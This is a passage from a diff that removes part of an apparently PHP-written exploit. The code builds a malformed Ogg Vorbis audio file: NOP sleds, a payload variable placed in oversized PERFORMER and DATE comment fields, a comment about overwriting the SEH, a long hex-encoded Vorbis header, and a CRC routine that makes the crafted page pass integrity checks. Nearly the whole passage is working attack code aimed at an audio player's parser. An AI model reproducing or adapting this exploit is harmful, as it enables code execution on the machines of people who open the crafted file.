-"\x00\x00\x00\x00";//if replaced with non-zero chars, overwrites seh ... do not touch
-
-$_frgmnt2.=$_boom."\x90\x90\x90\x90\x90\x90\x90\x90".str_repeat("\x90",$payload_len - strlen($_boom) - 8);
-$_frgmnt2.="\x0a\x20\x00\x00".
-"PERFORMER=";
-$_frgmnt2.=str_repeat("\x90",$payload_len);
-$_frgmnt2.="\x09\x00\x00\x00".
-"DATE=2009".
-"\x01\x05".
-"vorbis".
-"\x29\x42\x43\x56\x01\x00\x08\x00\x00\x00\x31\x4c\x20\xc5\x80\xd0".
-"\x90\x55\x00\x00\x10\x00\x00".
-"\x60\x24\x29\x0e\x93\x66\x49\x29\xa5".
-"\x94\xa1\x28\x79\x98\x94\x48\x49\x29\xa5\x94\xc5\x30\x89\x98\x94".
-"\x89\xc5\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x20".
-"\x34\x64\x15\x00\x00\x04\x00\x80\x28\x09\x8e\xa3\xe6\x49\x6a\xce".
-"\x39\x67\x18\x27\x8e\x72\xa0\x39\x69\x4e\x38\xa7\x20\x07\x8a\x51".
-"\xe0\x39\x09\xc2\xf5\x26\x63\x6e\xa6\xb4\xa6\x6b\x6e\xce\x29\x25".
-"\x08\x0d\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21".
-"\x85\x14\x62\x88\x21\x86\x18\x62\x88\x21\x87\x1c\x72\xc8\x21\xa7".
-"\x9c\x72\x0a\x2a\xa8\xa0\x82\x0a\x32\xc8\x20\x83\x4c\x32\xe9\xa4".
-"\x93\x4e\x3a\xe9\xa8\xa3\x8e\x3a\xea\x28\xb4\xd0\x42\x0b\x2d\xb4".
-"\xd2\x4a\x4c\x31\xd5\x56\x63\xae\xbd\x06\x5d\x7c\x73\xce\x39\xe7".
-"\x9c\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x20\x00".
-"\x00\x04\x42\x06\x19\x64\x10\x42\x08\x21\x85\x14\x52\x88\x29\xa6".
-"\x98\x72\x0a\x32\xc8\x80\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00".
-"\x00\x00\x47\x91\x14\x49\xb1\x14\xcb\xb1\x1c\xcd\xd1\x24\x4f\xf2".
-"\x2c\x51\x13\x35\xd1\x33\x45\x53\x54\x4d\x55\x55\x55\x55\x75\x5d".
-"\x57\x76\x65\xd7\x76\x75\xd7\x76\x7d\x59\x98\x85\x5b\xb8\x7d\x59".
-"\xb8\x85\x5b\xd8\x85\x5d\xf7\x85\x61\x18\x86\x61\x18\x86\x61\x18".
-"\x86\x61\xf8\x7d\xdf\xf7\x7d\xdf\xf7\x7d\x20\x34\x64\x15\x00\x20".
-"\x01\x00\xa0\x23\x39\x96\xe3\x29\xa2\x22\x1a\xa2\xe2\x39\xa2\x03".
-"\x84\x86\xac\x02\x00\x64\x00\x00\x04\x00\x20\x09\x92\x22\x29\x92".
-"\xa3\x49\xa6\x66\x6a\xae\x69\x9b\xb6\x68\xab\xb6\x6d\xcb\xb2\x2c".
-"\xcb\xb2\x0c\x84\x86\xac\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00".
-"\x00\xa0\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a".
-"\xa6\x69\x9a\xa6\x69\x9a\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65".
-"\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59".
-"\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x40\x68\xc8\x2a".
-"\x00\x40\x02\x00\x40\xc7\x71\x1c\xc7\x71\x24\x45\x52\x24\xc7\x72".
-"\x2c\x07\x08\x0d\x59\x05\x00\xc8\x00\x00\x08\x00\x40\x52\x2c\xc5".
-"\x72\x34\x47\x73\x34\xc7\x73\x3c\xc7\x73\x3c\x47\x74\x44\xc9\x94".
-"\x4c\xcd\xf4\x4c\x0f\x08\x0d\x59\x05\x00\x00\x02\x00\x08\x00\x00".
-"\x00\x00\x00\x40\x31\x1c\xc5\x71\x1c\xc9\xd1\x24\x4f\x52\x2d\xd3".
-"\x72\x35\x57\x73\x3d\xd7\x73\x4d\xd7\x75\x5d\x57\x55\x55\x55\x55".
-"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55".
-"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x81\xd0".
-"\x90\x55\x00\x00\x04\x00\x00\x21\x9d\x66\x96\x6a\x80\x08\x33\x90".
-"\x61\x20\x34\x64\x15\x00\x80\x00\x00\x00\x18\xa1\x08\x43\x0c\x08".
-"\x0d\x59\x05\x00\x00\x04\x00\x00\x88\xa1\xe4\x20\x9a\xd0\x9a\xf3".
-"\xcd\x39\x0e\x9a\xe5\xa0\xa9\x14\x9b\xd3\xc1\x89\x54\x9b\x27\xb9".
-"\xa9\x98\x9b\x73\xce\x39\xe7\x9c\x6c\xce\x19\xe3\x9c\x73\xce\x29".
-"\xca\x99\xc5\xa0\x99\xd0\x9a\x73\xce\x49\x0c\x9a\xa5\xa0\x99\xd0".
-"\x9a\x73\xce\x79\x12\x9b\x07\xad\xa9\xd2\x9a\x73\xce\x19\xe7\x9c".
-"\x0e\xc6\x19\x61\x9c\x73\xce\x69\xd2\x9a\x07\xa9\xd9\x58\x9b\x73".
-"\xce\x59\xd0\x9a\xe6\xa8\xb9\x14\x9b\x73\xce\x89\x94\x9b\x27\xb5".
-"\xb9\x54\x9b\x73\xce\x39\xe7\x9c\x73\xce\x39\xe7\x9c\x73\xce\xa9".
-"\x5e\x9c\xce\xc1\x39\xe1\x9c\x73\xce\x89\xda\x9b\x6b\xb9\x09\x5d".
-"\x9c\x73\xce\xf9\x64\x9c\xee\xcd\x09\xe1\x9c\x73\xce\x39\xe7\x9c".
-"\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x40\x00\x00".
-"\x04\x61\xd8\x18\xc6\x9d\x82\x20\x7d\x8e\x06\x62\x14\x21\xa6\x21".
-"\x93\x1e\x74\x8f\x0e\x93\xa0\x31\xc8\x29\xa4\x1e\x8d\x8e\x46\x4a".
-"\xa9\x83\x50\x52\x19\x27\xa5\x74\x82\xd0\x90\x55\x00\x00\x20\x00".
-"\x00\x84\x10\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x48\x21".
-"\x86\x18\x62\x88\x21\xa7\x9c\x72\x0a\x2a\xa8\xa4\x92\x8a\x2a\xca".
-"\x28\xb3\xcc\x32\xcb\x2c\xb3\xcc\x32\xcb\xac\xc3\xce\x3a\xeb\xb0".
-"\xc3\x10\x43\x0c\x31\xb4\xd2\x4a\x2c\x35\xd5\x56\x63\x8d\xb5\xe6".
-"\x9e\x73\xae\x39\x48\x6b\xa5\xb5\xd6\x5a\x2b\xa5\x94\x52\x4a\x29".
-"\xa5\x20\x34\x64\x15\x00\x00\x02\x00\x40\x20\x64\x90\x41\x06\x19".
-"\x85\x14\x52\x48\x21\x86\x98\x72\xca\x29\xa7\xa0\x82\x0a\x08\x0d".
-"\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\xf0\x24\xcf\x11\x1d\xd1".
-"\x11\x1d\xd1\x11\x1d\xd1\x11\x1d\xd1\x11\x1d\xcf\xf1\x1c\x51\x12".
-"\x25\x51\x12\x25\xd1\x32\x2d\x53\x33\x3d\x55\x54\x55\x57\x76\x6d".
-"\x59\x97\x75\xdb\xb7\x85\x5d\xd8\x75\xdf\xd7\x7d\xdf\xd7\x8d\x5f".
-"\x17\x86\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59".
-"\x96\x65\x09\x42\x43\x56\x01\x00\x20\x00\x00\x00\x42\x08\x21\x84".
-"\x14\x52\x48\x21\x85\x94\x62\x8c\x31\xc7\x9c\x83\x4e\x42\x09\x81".
-"\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x47\x71\x14\xc7".
-"\x91\x1c\xc9\x91\x24\x4b\xb2\x24\x4d\xd2\x2c\xcd\xf2\x34\x4f\xf3".
-"\x34\xd1\x13\x45\x51\x34\x4d\x53\x15\x5d\xd1\x15\x75\xd3\x16\x65".
-"\x53\x36\x5d\xd3\x35\x65\xd3\x55\x65\xd5\x76\x65\xd9\xb6\x65\x5b".
-"\xb7\x7d\x59\xb6\x7d\xdf\xf7\x7d\xdf\xf7\x7d\xdf\xf7\x7d\xdf\xf7".
-"\x7d\xdf\xd7\x75\x20\x34\x64\x15\x00\x20\x01\x00\xa0\x23\x39\x92".
-"\x22\x29\x92\x22\x39\x8e\xe3\x48\x92\x04\x84\x86\xac\x02\x00\x64".
-"\x00\x00\x04\x00\xa0\x28\x8e\xe2\x38\x8e\x23\x49\x92\x24\x59\x92".
-"\x26\x79\x96\x67\x89\x9a\xa9\x99\x9e\xe9\xa9\xa2\x0a\x84\x86\xac".
-"\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xa0\x68\x8a\xa7\x98".
-"\x8a\xa7\x88\x8a\xe7\x88\x8e\x28\x89\x96\x69\x89\x9a\xaa\xb9\xa2".
-"\x6c\xca\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb".
-"\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba".
-"\xae\xeb\xba\xae\xeb\xba\x40\x68\xc8\x2a\x00\x40\x02\x00\x40\x47".
-"\x72\x24\x47\x72\x24\x45\x52\x24\x45\x72\x24\x07\x08\x0d\x59\x05".
-"\x00\xc8\x00\x00\x08\x00\xc0\x31\x1c\x43\x52\x24\xc7\xb2\x2c\x4d".
-"\xf3\x34\x4f\xf3\x34\xd1\x13\x3d\xd1\x33\x3d\x55\x74\x45\x17\x08".
-"\x0d\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\xc0\x90\x0c".
-"\x4b\xb1\x1c\xcd\xd1\x24\x51\x52\x2d\xd5\x52\x35\xd5\x52\x2d\x55".
-"\x54\x3d\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55".
-"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55".
-"\x55\x55\x55\xd5\x34\x4d\xd3\x34\x81\xd0\x90\x95\x00\x00\x19\x00".
-"\x00\xe4\xa4\xa6\xd4\x7a\x0e\x12\x62\x90\x39\x89\x41\x68\x08\x49".
-"\xc4\x1c\xc5\x5c\x3a\xe9\x9c\xa3\x5c\x8c\x87\x90\x23\x46\x49\xed".
-"\x21\x53\xcc\x10\x04\xb5\x98\xd0\x49\x85\x14\xd4\xe2\x5a\x6a\x1d".
-"\x73\x54\x8b\x8d\xad\x64\x48\x41\x2d\xb6\xc6\x52\x21\xe5\xa8\x07".
-"\x42\x43\x56\x08\x00\xa1\x19\x00\x0e\xc7\x01\x1c\x4d\x03\x1c\x4b".
-"\x03\x00\x00\x00\x00\x00\x00\x00\x49\xd3\x00\x4d\x14\x01\xcd\x13".
-"\x01\x00\x00\x00\x00\x00\x00\xc0\xd1\x34\x40\x13\x3d\x40\x13\x45".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x1c\x4d\x03\x34\x51\x04\x34\x51\x04\x00\x00\x00".
-"\x00\x00\x00\x00\x4d\x14\x01\xd1\x54\x01\xd1\x34\x01\x00\x00\x00".
-"\x00\x00\x00\x40\x13\x45\xc0\x33\x45\x40\x34\x55\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x1c\x4d\x03\x34\x51\x04\x34\x51\x04\x00\x00\x00\x00\x00\x00\x00".
-"\x4d\x14\x01\x51\x35\x01\x4f\x34\x01\x00\x00\x00\x00\x00\x00\x40".
-"\x13\x45\x40\x34\x4d\x40\x54\x4d\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01".
-"\x00\x00\x01\x0e\x00\x00\x01\x16\x42\xa1\x21\x2b\x02\x80\x38\x01".
-"\x00\x87\xe3\x40\x92\x20\x49\xf0\x34\x80\x63\x59\xf0\x3c\x78\x1a".
-"\x4c\x13\xe0\x58\x16\x3c\x0f\x9a\x07\xd3\x04\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x40\xf2\x34\x78\x1e\x3c\x0f\xa6\x09\x90\x34\x0f".
-"\x9e\x07\xcf\x83\x69\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20".
-"\x79\x1e\x3c\x0f\x9e\x07\xd3\x04\x48\x9e\x07\xcf\x83\xe7\xc1\x34".
-"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x4c\x13\xa6\x09\xd1".
-"\x84\x6a\x02\x3c\xd3\x84\x69\xc2\x34\x61\xaa\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21\x2b".
-"\x02\x80\x38\x01\x00\x87\xa3\x48\x12\x00\x00\x38\x92\x64\x59\x00".
-"\x00\xa0\x48\x92\x65\x01\x00\x80\x65\x59\x9e\x07\x00\x00\x92\x65".
-"\x79\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21".
-"\x2b\x01\x80\x28\x00\x00\x87\xa2\x58\x16\x70\x1c\xcb\x02\x8e\x63".
-"\x59\x40\x92\x2c\x0b\x60\x59\x00\x4d\x03\x78\x1a\x40\x14\x01\x80".
-"\x00\x00\x80\x02\x07\x00\x80\x00\x1b\x34\x25\x16\x07\x28\x34\x64".
-"\x25\x00\x10\x05\x00\xe0\x70\x14\xcb\xd2\x34\x51\xe4\x38\x96\xa5".
-"\x69\xa2\xc8\x71\x2c\x4b\xd3\x44\x91\x65\x69\x9a\xa6\x89\x22\x34".
-"\x4b\xd3\x44\x11\x9e\xe7\x79\xa6\x09\xcf\xf3\x3c\xd3\x84\x28\x8a".
-"\xa2\x69\x02\x51\x34\x4d\x01\x00\x00\x05\x0e\x00\x00\x01\x36\x68".
-"\x4a\x2c\x0e\x50\x68\xc8\x4a\x00\x20\x24\x00\xc0\xe1\x38\x96\xe5".
-"\x79\xa2\x28\x8a\xa6\x69\x9a\xaa\xca\x71\x2c\xcb\xf3\x44\x51\x14".
-"\x4d\x53\x55\x5d\x97\xe3\x58\x96\xe7\x89\xa2\x28\x9a\xa6\xaa\xba".
-"\x2e\xcb\xd2\x34\xcf\x13\x45\x51\x34\x4d\x55\x75\x5d\x68\x9a\xe7".
-"\x89\xa2\x28\x9a\xa6\xaa\xba\x2e\x34\x4d\x14\x4d\xd3\x34\x55\x55".
-"\x55\x5d\x17\x9a\xe6\x89\xa6\x69\x9a\xaa\xaa\xaa\xae\x0b\xcf\x13".
-"\x45\xd3\x34\x4d\x55\x75\x5d\xd7\x05\xa2\x68\x9a\xa6\xa9\xaa\xae".
-"\xeb\xba\x40\x14\x4d\xd3\x34\x55\xd5\x75\x5d\x17\x88\xa2\x68\x9a".
-"\xa6\xaa\xba\xae\xeb\x02\xd3\x34\x4d\x55\x55\x5d\xd7\x95\x65\x80".
-"\x69\xaa\xaa\xaa\xba\xae\x2c\x03\x54\x55\x55\x5d\xd7\x95\x65\x19".
-"\xa0\xaa\xaa\xea\xba\xae\x2b\xcb\x00\xd7\x75\x5d\xd9\x95\x65\x59".
-"\x06\xe0\xba\xae\x2b\xcb\xb2\x2c\x00\x00\xe0\xc0\x01\x00\x20\xc0".
-"\x08\x3a\xc9\xa8\xb2\x08\x1b\x4d\xb8\xf0\x00\x14\x1a\xb2\x22\x00".
-"\x88\x02\x00\x00\x8c\x61\x4a\x31\xa5\x0c\x63\x12\x42\x0a\xa1\x61".
-"\x4c\x42\x48\x21\x64\x52\x52\x2a\x29\xa5\x0a\x42\x2a\x25\x95\x52".
-"\x41\x48\xa5\xa4\x52\x32\x4a\x2d\xa5\x96\x52\x05\x21\x95\x92\x4a".
-"\xa9\x20\xa4\x52\x52\x29\x05\x00\x80\x1d\x38\x00\x80\x1d\x58\x08".
-"\x85\x86\xac\x04\x00\xf2\x00\x00\x08\x63\x94\x62\xcc\x39\xe7\x24".
-"\x42\x4a\x31\xe6\x9c\x73\x12\x21\xa5\x18\x73\xce\x39\xa9\x14\x63".
-"\xce\x39\xe7\x9c\x94\x92\x31\xe7\x9c\x73\x4e\x4a\xc9\x98\x73\xce".
-"\x39\x27\xa5\x64\xcc\x39\xe7\x9c\x93\x52\x3a\xe7\x9c\x73\x0e\x4a".
-"\x29\xa5\x74\xce\x39\xe7\xa4\x94\x52\x42\xe8\x9c\x73\x52\x4a\x29".
-"\x9d\x73\xce\x39\x01\x00\x40\x05\x0e\x00\x00\x01\x36\x8a\x6c\x4e".
-"\x30\x12\x54\x68\xc8\x4a\x00\x20\x15\x00\xc0\xe0\x38\x96\xa5\x69".
-"\x9e\x27\x8a\xa6\x69\x49\x92\xa6\x79\x9e\x27\x9a\xa6\x69\x6a\x92".
-"\xa4\x69\x9e\x27\x8a\xa6\x69\x9a\x3c\xcf\xf3\x44\x51\x14\x4d\x53".
-"\x55\x79\x9e\xe7\x89\xa2\x28\x9a\xa6\xaa\x72\x5d\x51\x14\x4d\xd3".
-"\x34\x4d\x55\x25\xcb\xa2\x28\x8a\xa6\xa9\xaa\xaa\x0a\xd3\x34\x4d".
-"\xd3\x54\x55\x55\x85\x69\x9a\xa6\x69\xaa\xaa\xeb\xc2\xb6\x55\x55".
-"\x55\x5d\xd7\x75\x61\xdb\xaa\xaa\xaa\xae\xeb\xba\xc0\x75\x5d\xd7".
-"\x75\x65\x19\xb8\xae\xeb\xba\xae\x2c\x0b\x00\x00\x4f\x70\x00\x00".
-"\x2a\xb0\x61\x75\x84\x93\xa2\xb1\xc0\x42\x43\x56\x02\x00\x19\x00".
-"\x00\x84\x31\x08\x29\x84\x10\x52\x06\x21\xa4\x10\x42\x48\x29\x85".
-"\x90\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21\x2b\x01".
-"\x80\x70\x00\x00\x80\x10\x8c\x31\xc6\x18\x63\x8c\x31\x36\x8c\x61".
-"\x8c\x31\xc6\x18\x63\x8c\x31\x71\x0a\x63\x8c\x31\xc6\x18\x63\x8c".
-"\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31".
-"\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6".
-"\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18".
-"\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63".
-"\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c".
-"\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31".
-"\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\xd8\x5a\x6b\xad\xb5".
-"\x56\x00\x18\xce\x85\x03\x40\x59\x84\x8d\x33\xac\x24\x9d\x15\x8e".
-"\x06\x17\x1a\xb2\x12\x00\x08\x09\x00\x00\x8c\x41\x88\x31\xe8\x24".
-"\x94\x92\x4a\x4a\x15\x42\x8c\x39\x28\x25\x95\x96\x5a\x8a\xad\x42".
-"\x88\x31\x08\xa5\xa4\xd4\x5a\x6c\x31\x16\xcf\x39\x07\xa1\xa4\x94".
-"\x5a\x8a\x29\xb6\xe2\x39\xe7\xa4\xa4\xd4\x5a\x8c\x31\xc6\x5a\x5c".
-"\x0b\x21\xa5\x94\x5a\x8b\x2d\xb6\x18\x9b\x6c\x21\xa4\x94\x52\x6b".
-"\x31\xc6\x5a\x63\x33\x4a\xb5\x94\x5a\x8b\x31\xc6\x18\x6b\x2c\x4a".
-"\xb9\x94\x52\x6b\xb1\xc5\x18\x6b\x8d\x45\x28\x9b\x5b\x6b\x31\xc6".
-"\x5a\x6b\xad\x35\x29\xe5\x73\x4b\xb1\xd5\x5a\x63\xac\xb5\x26\xa3".
-"\x8c\x92\x31\xc6\x5a\x6b\xac\xb5\xd6\x22\x94\x52\x32\xc6\x14\x53".
-"\xac\xb5\xd6\x9a\x84\x30\xc6\xf7\x18\x63\xac\x31\xe7\x5a\x93\x12".
-"\xc2\xf8\x1e\x53\x2d\xb1\xd5\x5a\x6b\x52\x4a\x29\x23\x64\x8d\xa9".
-"\xc6\x5a\x73\x4e\x4a\x09\x65\x8c\x8d\x2d\xd5\x94\x73\xce\x05\x00".
-"\x40\x3d\x38\x00\x40\x25\x18\x41\x27\x19\x55\x16\x61\xa3\x09\x17".
-"\x1e\x80\x42\x43\x56\x02\x00\xb9\x01\x00\x08\x42\x4a\x31\xc6\x98".
-"\x73\xce\x39\xe7\x9c\x73\x0e\x52\xa4\x18\x73\xcc\x39\xe7\x20\x84".
-"\x10\x42\x08\x21\xa4\x08\x31\xc6\x98\x73\xce\x41\x08\x21\x84\x10".
-"\x42\x48\x19\x63\xcc\x39\xe7\x20\x84\x10\x42\x08\xa1\x84\x92\x52".
-"\xca\x98\x73\xce\x41\x08\x21\x84\x52\x4a\x29\x25\xa5\xd4\x39\xe7".
-"\x20\x84\x10\x42\x28\xa5\x94\x52\x4a\x4a\xa9\x73\xce\x41\x08\x21".
-"\x84\x52\x4a\x29\xa5\x94\x94\x52\x08\x21\x84\x10\x42\x08\xa5\x94".
-"\x52\x4a\x29\x29\xa5\x94\x42\x08\x21\x84\x12\x4a\x29\xa5\x94\x52".
-"\x52\x4a\x29\x85\x10\x42\x08\xa5\x94\x52\x4a\x29\xa5\xa4\x94\x52".
-"\x0a\x21\x84\x10\x4a\x29\xa5\x94\x52\x4a\x49\x29\xa5\x14\x42\x09".
-"\xa5\x94\x52\x4a\x29\xa5\x94\x92\x52\x4a\x29\xa5\x10\x4a\x29\xa5".
-"\x94\x52\x4a\x29\x25\xa5\x94\x52\x4a\xa5\x94\x52\x4a\x29\xa5\x94".
-"\x52\x4a\x4a\x29\xa5\x94\x4a\x29\xa5\x94\x52\x4a\x29\xa5\x94\x94".
-"\x52\x4a\x29\x95\x52\x4a\x29\xa5\x94\x52\x4a\x29\x29\xa5\x94\x52".
-"\x4a\xa9\x94\x52\x4a\x29\xa5\x94\x52\x52\x4a\x29\xa5\x94\x52\x29".
-"\xa5\x94\x52\x4a\x29\xa5\xa4\x94\x52\x4a\x29\xa5\x52\x4a\x29\xa5".
-"\x94\x52\x4a\x49\x29\xa5\x94\x52\x4a\xa5\x94\x52\x4a\x29\xa5\x94".
-"\x92\x52\x4a\x29\xa5\x94\x52\x2a\xa5\x94\x52\x4a\x29\xa5\x00\x00".
-"\xa0\x03\x07\x00\x80\x00\x23\x2a\x2d\xc4\x4e\x33\xae\x3c\x02\x47".
-"\x14\x32\x4c\x40\x85\x86\xac\x04\x00\xc8\x00\x00\x10\x07\xb1\xb4".
-"\xd6\x5a\xab\x8c\x72\xca\x49\x49\xad\x43\x46\x1a\xe6\xa0\xa4\xd8".
-"\x49\x07\x21\xb5\x58\x4b\x65\x20\x41\xca\x49\x4a\x9d\x82\x08\x29".
-"\x06\xa9\x85\x8c\x2a\xa5\x98\x93\x96\x42\xcb\x98\x52\x0c\x62\x2b".
-"\x31\x74\x8c\x31\x47\x39\xe5\x54\x42\xc7\x18\x00\x00\x00\x82\x00".
-"\x00\x03\x11\x32\x13\x08\x14\x40\x81\x81\x0c\x00\x38\x40\x48\x90".
-"\x02\x00\x0a\x0b\x0c\x1d\xc3\x45\x40\x40\x2e\x21\xa3\xc0\xa0\x70".
-"\x4c\x38\x27\x9d\x36\x00\x00\x41\x88";
-
-function crcOgg (&$_x) 			
-	{
-	$crc=0;
-	$polynom=0x04C11DB7; //polynomial generator
-	for ($i=0; $i<strlen($_x); $i++)
-		{
-		$c = ord($_x[$i]);
-		for ($j=0; $j<8; $j++)
-			{
-			$bit=0;
-			if ($crc&0x80000000) $bit=1;
-			if ($c&0x80) $bit^=1;
-			$c<<=1;	$crc<<=1;
-			if ($bit) $crc^=$polynom;
-			}
-		}
-	$_x[22]=chr($crc&0xFF);       $_x[23]=chr(($crc>>8)&0xFF);
-      $_x[24]=chr(($crc>>16)&0xFF); $_x[25]=chr(($crc>>24)&0xFF);
-	}
-
-crcOgg($_frgmnt2);
-
-$_frgmnt3="\x4f\x67\x67\x53\x00\x01\x00".
